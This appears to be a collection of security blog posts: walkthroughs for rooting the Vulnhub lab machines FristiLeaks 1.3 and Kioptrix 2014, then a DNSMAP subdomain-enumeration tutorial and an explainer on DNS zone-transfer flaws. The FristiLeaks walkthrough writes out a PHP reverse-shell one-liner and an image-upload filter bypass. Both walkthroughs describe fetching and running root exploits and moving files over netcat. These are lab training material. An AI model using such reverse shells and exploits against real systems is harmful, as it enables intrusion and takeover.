FristiLeaks: 1.3 Vulnhub Walkthrough

Hi, Lets see how we rooted Fristi by Ar0xA from Vulnhub.

First Find the IP and do a port scan.

We have only one port open. Lets scan using Nikto and Gobuster.

Now Gobuster.

Visit the pages found. Nothing inetersting. Right?

We need to find something else. Have a look at the following address.

A login page right?

Lets bry breaking it. SQL Injection didnt work. There must be some other ways. Lets have a look at the source code.

We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz

Need to look more 🙂 Scroll down to the end.


Looks like this is base64 encoded. Lets try decoding.

visit for decoding.

Seems like a PNG image? Lets try decoding as an image here:

We got an Image.

Hope this is the password. But what about the username? admin? fristi?

they didnt work. Lets try eezeepz.

Yes. We are logged in now. We have a file upload form here. But it accepts only images.

We need to upload a php shell as an image here.

I used this shell

Rename the file to shell.php.gif and upload.

Fire up Burpsuite and catch the upload request.

Edit the filename in the request to shell.php.gif and send.

we will get a response as uploaded to uploads directory. Now head to /uploads/shell.php.gif

Now we can set up a listener in our kali machine and connect from this shell.

nc -nlvp 4444

Enter the following command and click Exec.

php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

We got a connection to our Kali machine.

Now its the time for privilege escalation. Use the command uname -a to know the OS version.

Lets search for an exploit.

What about usng this?

Lets try

Lets download the file using wget.

Time to compile and run the exploit.

Done! we gave a new user firefart with password pass.

Lets see if it is present on /etc/passwd

Yes, Its there at the top. Now lets move to our new account and check our root access.

Yes! we are root now. What about the flag?

Thats all. It took a little more time for me to find the fristi directory, But the privlege escalation part was quick.

Kioptrix: 2014 (#5) Vulnhub Wlakthrough

In this blog post we will see how to root the Kioptrix 2014 Machine from Vulnhub.

First lets find the IP and open posts in the machine using nmap:


Here we have the IP.

The post 80 is open so there will be some web server running, lets have a look.

Yes, there is a page. Anything behind that? Lets have a look in the source code.

Here we have ‘pChart2.1.3’. Now we need to know what is pChart. Lets have a quick Google search.

The website says it is a php based charting library. Now lets look for any existing vulnerabilities in pChart 2.1.3.

Exploit-DB says there are directory traversal and XSS vulnerabilities in pChart 2.1.3

Lets try that. by visiting the following page.

We have got the /etc.passwd file displayed on the browser.

Now lets try to read the httpd.conf file.

It works!

When we scroll down to the end, we will find something interesting.

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser


If our user agent is Mozilla/4.0, we can connect to port 8080.

Lets try that.

curl -H "User-Agent:Mozilla/4.0"

And the resut is,

We have a hyperlink here, to /phptax/ lets try this on a browser.

I’m using a Firefox extension to switch user agents. Get that here:

I’ve installed the extension and activated the custom user agent for our machine.

Now let’s load the page in browser.

Going Inside..

This looks like an app for filling tax forms. Ok. so lets look is there is any known vulnerabilities in this.

According to Exploit-DB, there is an RCE vulnerability in PhpTax.

Lets try to exploit that with Metasploit.

search phptax

Now lets set the options.

Now enter run to run the exploit.

We got the shell now.

Now use the whoami command to know the current user.

Now use command /bin/sh -i to get a fully interactive shell.

Lets now get the OS version the machine is running.

Use the command uname -a for that.

We are on FreeBSD 9.0. Lets look up online for available exploits.

We have a privilege escalation exploit at Exploit-DB, Lets try that.

Download the exploit to our Kali machine.

wget exploit.c -O exploit.c

Time to send the file to target machine. The target does not have wget or curl. So we will use netcat to transfer the file.

Lets start a listener on our kali machine and send the file on target machine’s /tmp directory.

On target machine,

Now we got the exploit file on our target.

Now lets compile it using gcc.

Time to exploit!

We are root now!

DNSMAP Tutorial, What is it and How to use it?

DNSMAP is a tool for identifying the subdomains of a given domain. It used by pentesters during the information gathering/enumeration phase of infrastructure security assessments.

Subdomain brute-forcing is another technique that should be used in the enumeration stage, as it’s especially useful when other domain enumeration techniques such as zone transfers don’t work.

Installing DNSMAP

If you don’t have DNSMAP installed in your machine, install it using the following command.

sudo apt install dnsmap


Using DNSMAP we can scan the subdomains of a domain simply by entering the domain name and specifying a wordlist file as shown in the example.

In addition, we can exports the requests to a Comma Seperated Values (CSV) file, set deay in between DNS requests and ignore specific IPs in the enumeration process.

If we don’t specify a wordlist file, the program will load the default wordlist and a random waiting time between requests for us.


Other examples

Specifying custom wordlist.

dnsmap -w yourwordlist.txt

Specifying a results file.

dnsmap -r dnsmap_results.txt

Specifying a custom delay between requests

dnsmap -d 3000

DNS Zone Transfer Vulnerability, What is it?

A DNS server is a database that stores IP addresses and domain names and related information. The primary duty of a DNS server is to resolve domain names to IP addresses.

DNS Zone File

DNS Zone file is a simple file that holds the data of a domain. This contains the mapping of domain names. IP addresses and other resources. A DNS Zone file can contain data about multiple subdomains and a DNS server can hold information about multiple servers.

Master and Slave DNS Servers

A Master DNS server is the server which holds the master copy of the zone file. When this file is updated, the slave DNS servers request a copy of this file and update their zone file.

What is Zone Transfer

DNS Zone transfer is the process of copying the DNS information form a master DNS server to a slave DNS server. This is used to copy data from the master DNS server to Slave servers. The primary/master DNS server should allow the zone transfer only to its secondary/slave servers. The Zone Transfer vulnerability arises when the primary server allows zone transfer to anyone who requests it.

By exploiting this vulnerability, attackers can get a copy of the zone file. This may not have a direct impact on the organization. But the attackers can collect a lot of information about the IP addresses and domains which will help in developing a plan to exploit and break into an organization.